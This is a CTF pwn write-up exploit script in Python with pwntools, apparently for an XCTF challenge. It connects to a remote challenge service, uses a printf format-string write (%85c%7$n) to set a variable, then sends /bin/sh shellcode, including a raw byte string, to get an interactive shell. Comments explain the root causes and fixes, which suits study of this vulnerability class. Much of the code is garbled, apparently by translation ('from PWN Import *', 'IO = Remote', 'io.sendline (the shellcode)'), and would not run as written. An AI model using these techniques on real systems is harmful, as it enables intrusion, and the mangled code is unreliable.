encoding = UTF. 8-#
#! usr / bin / Python
# Write-up exploit script for a CTF pwn task (see the references at the bottom of the page).
# Flow as the script shows it: connect to the service, read the leaked address of v3[0],
# answer the menu prompts, use a printf format-string bug to write the value 85 into v3[0],
# then hand the program shellcode that it calls through a function pointer, and finally
# drop into an interactive session.
# Defender's view of the two root causes this write-up relies on: untrusted input reaches
# printf as the *format* argument (fix: printf("%s", buf); build with -Wformat-security),
# and attacker-supplied bytes are cast to a function pointer and executed (fix: never
# execute data buffers; keep NX / W^X enforced so such a call faults instead).
from PWN Import *
IO = Remote ( '111.198.29.45', 42643) # host and port of the challenge service
io.recvuntil ( "Secret [0] IS")
# recvuntil(s) consumes output from the connection until s has been received
v3_0_addr = int (io.recvuntil ( "\ n") [: - 1], 16) # the program prints the address of v3[0]; parse the hex text with its trailing newline stripped
log.info ( "v3_0_addr:" + hex (v3_0_addr))
# menu step 1: enter sub_4000D72()
IO. recvuntil ( "BE Character's name:")
io.sendline ( "123")
# menu step 2: enter sub_400A7D()
io.recvuntil ( "East or up ?:")
io.sendline ( "East")
# menu step 3: enter sub_400BB9(), whose printf uses our input as the format string; the author uses that write to set v3[0] to 85
io.recvuntil ( "there (. 1), or Leave (0) ?:")
io.sendline ( ". 1")
io.recvuntil ( " 'Give me an address'")
io.sendline(str(v3_0_addr))
io.recvuntil("you wish is:")
io.sendline("%85c%7$n")
# A format of the form %<count>c%<index>$n makes printf emit <count> characters and then store the number of
# characters emitted so far into the address found in its <index>-th argument. Here %85c emits 85 characters
# and %7$n stores 85 through the seventh argument -- presumably the address supplied at "Give me an address" above.
# Defensive note: the underlying bug is printf(buf) instead of printf("%s", buf); -Werror=format-security
# rejects such calls at compile time.
# menu step 4: sub_400CA6() casts v1 to a function pointer and calls it, so the bytes we send are executed;
# the author sends shellcode that spawns /bin/sh to obtain a shell
context (OS = 'Linux ', arch =' amd64 ') # tell pwntools the target OS and architecture so asm() assembles for amd64 Linux
shellcode = ASM (shellcraft.sh ()) # assemble the shellcraft.sh() template into machine code (the author's first attempt failed; see the note below)
# (the shellcode = "\ X6a \ X3B \ X58 \ x99 \ X52 \ X48 \ xbb \ X2F \ X2F \ X62 \ X69 \ x6e \ X2F \ X73 \ X68 \ X53 \ X54 \ X5F \ X52 \ X57 \ X54 \ x5e \ X0F \ X05 ")
# Note: the earlier failure was not the generated shellcode; the author had simply forgotten to set context() first
# shellcraft is pwntools' shellcode-template helper; shellcraft.sh() returns assembly that spawns /bin/sh, and asm() turns it into machine code
io.recvuntil ( "the USE YOU SPELL")
io.sendline (the shellcode)
io.interactive ()
References:
https://www.jianshu.com/p/457520f97a76
https://blog.csdn.net/qq_35495684/article/details/79583232
https://adworld.xctf.org.cn/task/writeup?type=pwn&id=5056&number=2&grade=0&page=1